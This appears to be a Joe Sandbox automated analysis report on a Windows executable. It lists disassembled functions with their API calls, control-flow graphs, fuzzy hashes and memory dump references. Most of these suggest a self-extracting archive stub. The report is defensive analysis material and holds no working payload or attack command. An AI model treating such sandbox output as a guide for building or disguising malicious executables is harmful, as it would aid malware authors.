                                        • GetLastError.KERNEL32(?,?,002D7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002D99AA
                                        • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,002D7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002D99F9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: File$CreateErrorLast$Time
                                        • String ID:
                                        • API String ID: 1999340476-0
                                        • Opcode ID: 8d24f70283d23d0bcceb183c0a31a484c022f757083503551786522148fe31ca
                                        • Instruction ID: 9cc2e98b07e72c2490b3b3efa359c51497c62d3e766221e031a6698848148ddd
                                        • Opcode Fuzzy Hash: 8d24f70283d23d0bcceb183c0a31a484c022f757083503551786522148fe31ca
                                        • Instruction Fuzzy Hash: C1312330555346AFE7309F24CC56BDABB98BB04320F200B1FF9A1962D0D3B4ADA4CB91
                                        Function 002EB568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1059 2eb568-2eb581 PeekMessageW 1060 2eb5bc-2eb5be 1059->1060 1061 2eb583-2eb597 GetMessageW 1059->1061 1062 2eb5a8-2eb5b6 TranslateMessage DispatchMessageW 1061->1062 1063 2eb599-2eb5a6 IsDialogMessageW 1061->1063 1062->1060 1063->1060 1063->1062
                                        APIs
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002EB579
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002EB58A
                                        • IsDialogMessageW.USER32(00010456,?), ref: 002EB59E
                                        • TranslateMessage.USER32(?), ref: 002EB5AC
                                        • DispatchMessageW.USER32(?), ref: 002EB5B6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 1266772231-0
                                        • Opcode ID: 58146baa727313c8338089f5782d2cb44754f69cdb5348042086386d203fea2a
                                        • Instruction ID: e7264e92a4548f139c7e5cd6d093084f5d32c45cd20b7f85816d3ad2cb1400cd
                                        • Opcode Fuzzy Hash: 58146baa727313c8338089f5782d2cb44754f69cdb5348042086386d203fea2a
                                        • Instruction Fuzzy Hash: EFF0BD71A0115AAB8B25AFE69C8CDEB7FACEE05391B408415B916D2010EB34D605CBB0
                                        Function 002EABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1064 2eabab-2eabca GetClassNameW 1065 2eabcc-2eabe1 call 2e1fbb 1064->1065 1066 2eabf2-2eabf4 1064->1066 1071 2eabe3-2eabef FindWindowExW 1065->1071 1072 2eabf1 1065->1072 1068 2eabff-2eac01 1066->1068 1069 2eabf6-2eabf9 SHAutoComplete 1066->1069 1069->1068 1071->1072 1072->1066
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000050), ref: 002EABC2
                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 002EABF9
                                          • Part of subcall function 002E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,002DC116,00000000,.exe,?,?,00000800,?,?,?,002E8E3C), ref: 002E1FD1
                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 002EABE9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                        • String ID: EDIT
                                        • API String ID: 4243998846-3080729518
                                        • Opcode ID: da0f0a57338753e36437d7a6bdb690d3fd7eb6620748ea3d113ea3c37daaff8a
                                        • Instruction ID: 92257e53ad82fe573a9dd35fc5012ae2f7878432db2e5b605312e2d2f4768070
                                        • Opcode Fuzzy Hash: da0f0a57338753e36437d7a6bdb690d3fd7eb6620748ea3d113ea3c37daaff8a
                                        • Instruction Fuzzy Hash: 95F0273674122977DB215B269C49FDF72AC9F42B00F884025BA01F30C0D760EE5185F6
                                        Function 002EDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1073 2edbde-2edc09 call 2eec50 SetEnvironmentVariableW call 2e0371 1077 2edc0e-2edc12 1073->1077 1078 2edc36-2edc38 1077->1078 1079 2edc14-2edc18 1077->1079 1080 2edc21-2edc28 call 2e048d 1079->1080 1083 2edc1a-2edc20 1080->1083 1084 2edc2a-2edc30 SetEnvironmentVariableW 1080->1084 1083->1080 1084->1078
                                        APIs
                                        • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 002EDBF4
                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 002EDC30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: EnvironmentVariable
                                        • String ID: sfxcmd$sfxpar
                                        • API String ID: 1431749950-3493335439
                                        • Opcode ID: 8c39cfee41418fcaa4719fdadb5f7d92c2afaedba90a51e5a7f28a77bf7b823b
                                        • Instruction ID: 6b9bd51fa004bdf68f69496250ae6fca6573327d027f63211fd25eb2fe572919
                                        • Opcode Fuzzy Hash: 8c39cfee41418fcaa4719fdadb5f7d92c2afaedba90a51e5a7f28a77bf7b823b
                                        • Instruction Fuzzy Hash: 6BF0EC724A5265A7CF212F968C06BFB375CAF18BC1B540452FD8595191D6F08990DEB0
                                        Function 002D9785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1085 2d9785-2d9791 1086 2d979e-2d97b5 ReadFile 1085->1086 1087 2d9793-2d979b GetStdHandle 1085->1087 1088 2d97b7-2d97c0 call 2d98bc 1086->1088 1089 2d9811 1086->1089 1087->1086 1093 2d97d9-2d97dd 1088->1093 1094 2d97c2-2d97ca 1088->1094 1091 2d9814-2d9817 1089->1091 1096 2d97df-2d97e8 GetLastError 1093->1096 1097 2d97ee-2d97f2 1093->1097 1094->1093 1095 2d97cc 1094->1095 1098 2d97cd-2d97d7 call 2d9785 1095->1098 1096->1097 1099 2d97ea-2d97ec 1096->1099 1100 2d980c-2d980f 1097->1100 1101 2d97f4-2d97fc 1097->1101 1098->1091 1099->1091 1100->1091 1101->1100 1102 2d97fe-2d9807 GetLastError 1101->1102 1102->1100 1104 2d9809-2d980a 1102->1104 1104->1098
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6), ref: 002D9795
                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 002D97AD
                                        • GetLastError.KERNEL32 ref: 002D97DF
                                        • GetLastError.KERNEL32 ref: 002D97FE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FileHandleRead
                                        • String ID:
                                        • API String ID: 2244327787-0
                                        • Opcode ID: 73bb26c0b19353f10557251e4228a2ab5b901a9278b406f5dd50ae24495e9792
                                        • Instruction ID: 6cca61ad8ddd1caf883f4a555b409b26c0e357036db72e8054e75e69f8066d69
                                        • Opcode Fuzzy Hash: 73bb26c0b19353f10557251e4228a2ab5b901a9278b406f5dd50ae24495e9792
                                        • Instruction Fuzzy Hash: D7118270930205EBEF215F65C80466977ADFB42721F20862BF817D5390D7749EE4EB61
                                        Function 002FAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,002F3F73,00000000,00000000,?,002FACDB,002F3F73,00000000,00000000,00000000,?,002FAED8,00000006,FlsSetValue), ref: 002FAD66
                                        • GetLastError.KERNEL32(?,002FACDB,002F3F73,00000000,00000000,00000000,?,002FAED8,00000006,FlsSetValue,00307970,FlsSetValue,00000000,00000364,?,002F98B7), ref: 002FAD72
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,002FACDB,002F3F73,00000000,00000000,00000000,?,002FAED8,00000006,FlsSetValue,00307970,FlsSetValue,00000000), ref: 002FAD80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 6653b9d05ba72e832417ed452f3dcfecd47c4be89c5ebd0fbde2cab4c5c98f8a
                                        • Instruction ID: df6f12cadfdad1fa31b69f6471cb8bdddbc883ffda3b2045076b4e7a6f531fd8
                                        • Opcode Fuzzy Hash: 6653b9d05ba72e832417ed452f3dcfecd47c4be89c5ebd0fbde2cab4c5c98f8a
                                        • Instruction Fuzzy Hash: E901F77663222BABC7224F68DC54AA7BB5CEF05BE2B110631FA0BD3551D720D91186E1
                                        Function 002FBA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002F97E5: GetLastError.KERNEL32(?,00311030,002F4674,00311030,?,?,002F3F73,00000050,?,00311030,00000200), ref: 002F97E9
                                          • Part of subcall function 002F97E5: _free.LIBCMT ref: 002F981C
                                          • Part of subcall function 002F97E5: SetLastError.KERNEL32(00000000,?,00311030,00000200), ref: 002F985D
                                          • Part of subcall function 002F97E5: _abort.LIBCMT ref: 002F9863
                                          • Part of subcall function 002FBB4E: _abort.LIBCMT ref: 002FBB80
                                          • Part of subcall function 002FBB4E: _free.LIBCMT ref: 002FBBB4
                                          • Part of subcall function 002FB7BB: GetOEMCP.KERNEL32(00000000,?,?,002FBA44,?), ref: 002FB7E6
                                        • _free.LIBCMT ref: 002FBA9F
                                        • _free.LIBCMT ref: 002FBAD5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _free$ErrorLast_abort
                                        • String ID: p0
                                        • API String ID: 2991157371-140255176
                                        • Opcode ID: d234a4bda447189fc866f684d649744841b6d67c872f4b11c89a2ef1908a852e
                                        • Instruction ID: 276a75f69d770cb7a503573502fa0e082b8b615ffe40ed91b4b2695c90996ea5
                                        • Opcode Fuzzy Hash: d234a4bda447189fc866f684d649744841b6d67c872f4b11c89a2ef1908a852e
                                        • Instruction Fuzzy Hash: 1331C13191020DAFDB12EFA8C441BB9F7E5EF453A0F2140A9EA049B2A2EB325D50DF50
                                        Function 002EE528 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE51F
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: (.$PDu<.
                                        • API String ID: 1269201914-1205553035
                                        • Opcode ID: a8ce44cad0e8ab275b2689ab44956dc4323f91158c4adf9291e1e9d91d3709c0
                                        • Instruction ID: f9b4f9bbaa9997b3760455130b0f2b910223e109778425b2b594d2d298bdc1b4
                                        • Opcode Fuzzy Hash: a8ce44cad0e8ab275b2689ab44956dc4323f91158c4adf9291e1e9d91d3709c0
                                        • Instruction Fuzzy Hash: 49B012C52F94C07C7509920A1D12C3B050DC0C1F117F1D12EF405C40C0E8810C550831
                                        Function 002EE532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE51F
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: 2.$PDu<.
                                        • API String ID: 1269201914-1655046575
                                        • Opcode ID: 1372a03f28ebce7edc397fc051f845204d7a7c971ebd385e67cbd716f3d8b604
                                        • Instruction ID: d110441f5418f5e94be9c10ac41799ee051fa55f35e489da2cdd4ebd77d06884
                                        • Opcode Fuzzy Hash: 1372a03f28ebce7edc397fc051f845204d7a7c971ebd385e67cbd716f3d8b604
                                        • Instruction Fuzzy Hash: 7AB012C52F95807D7509920A1D12D3B010DC0C1F117F1912EF405C40C0E8800C140831
                                        Function 002D9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F5,?,?,?,?,002DD343,00000001,?,?,?,00000000,002E551D,?,?,?), ref: 002D9F9E
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,002E551D,?,?,?,?,?,002E4FC7,?), ref: 002D9FE5
                                        • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,002DD343,00000001,?,?), ref: 002DA011
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: FileWrite$Handle
                                        • String ID:
                                        • API String ID: 4209713984-0
                                        • Opcode ID: 8a83b48e63751074d958ef8d6df4d9683642f0442e27b7f535c1d7709b5f6c67
                                        • Instruction ID: 6687e7df3b799cab653dc5ff889255bae0f1886c437d3cada9d19f824759933b
                                        • Opcode Fuzzy Hash: 8a83b48e63751074d958ef8d6df4d9683642f0442e27b7f535c1d7709b5f6c67
                                        • Instruction Fuzzy Hash: E331F331218306AFDB15CF20D818BAE77A9FF84715F04491EF98297390C775AD98CBA2
                                        Function 002DA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002DC27E: _wcslen.LIBCMT ref: 002DC284
                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,002DA175,?,00000001,00000000,?,?), ref: 002DA2D9
                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,002DA175,?,00000001,00000000,?,?), ref: 002DA30C
                                        • GetLastError.KERNEL32(?,?,?,?,002DA175,?,00000001,00000000,?,?), ref: 002DA329
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: CreateDirectory$ErrorLast_wcslen
                                        • String ID:
                                        • API String ID: 2260680371-0
                                        • Opcode ID: cfae8cf9b3785adc958d3da06095b2d6491bfa44032844222ace86d8936a9e0d
                                        • Instruction ID: 76f240a65c9b7dd816b304c627a00b2b3b937271b9d34a87fab0dca417b8ef25
                                        • Opcode Fuzzy Hash: cfae8cf9b3785adc958d3da06095b2d6491bfa44032844222ace86d8936a9e0d
                                        • Instruction Fuzzy Hash: 3A01B5311212516AEF61AF754C09FED324D9F0A780F044457F902D6281D754CEA1CAB2
                                        Function 002FB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 002FB8B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Info
                                        • String ID:
                                        • API String ID: 1807457897-3916222277
                                        • Opcode ID: 5328d5b1d1336779ab12eef77b7233e78deac4d48f2e777d59c6d8ca8a9eaacf
                                        • Instruction ID: b6da61c7c101c8b8d779fbc20e2805e1adc442edd7f7cba030b58f744797b909
                                        • Opcode Fuzzy Hash: 5328d5b1d1336779ab12eef77b7233e78deac4d48f2e777d59c6d8ca8a9eaacf
                                        • Instruction Fuzzy Hash: 5D4127B051428C9EDB238E28CC84BF6FBADEB45744F1404FDE79A86142D3B5AA55CF60
                                        Function 002FAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 002FAFDD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: String
                                        • String ID: LCMapStringEx
                                        • API String ID: 2568140703-3893581201
                                        • Opcode ID: 5679c2faddd60ccb9d375c2514f3e4198c345eecb40d74b4eae97d13c3ba1699
                                        • Instruction ID: 899b554d607075a31ea957718fc2429013fb8ef8d470ded33677957d628e1dee
                                        • Opcode Fuzzy Hash: 5679c2faddd60ccb9d375c2514f3e4198c345eecb40d74b4eae97d13c3ba1699
                                        • Instruction Fuzzy Hash: DA01257260520DBBCF029F90DC16DEEBF6AEF09750F014265FE1826160CB329A31AB91
                                        Function 002FAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,002FA56F), ref: 002FAF55
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: CountCriticalInitializeSectionSpin
                                        • String ID: InitializeCriticalSectionEx
                                        • API String ID: 2593887523-3084827643
                                        • Opcode ID: 6613322fbb66f2451a1c2c104eb9f36dd71b3efcb5a9db2c47ce8b3481b5f9d2
                                        • Instruction ID: 79fb999db96ae27d7e6c3e4dab504ba21b8b52f97046c0c085905b8692a8c074
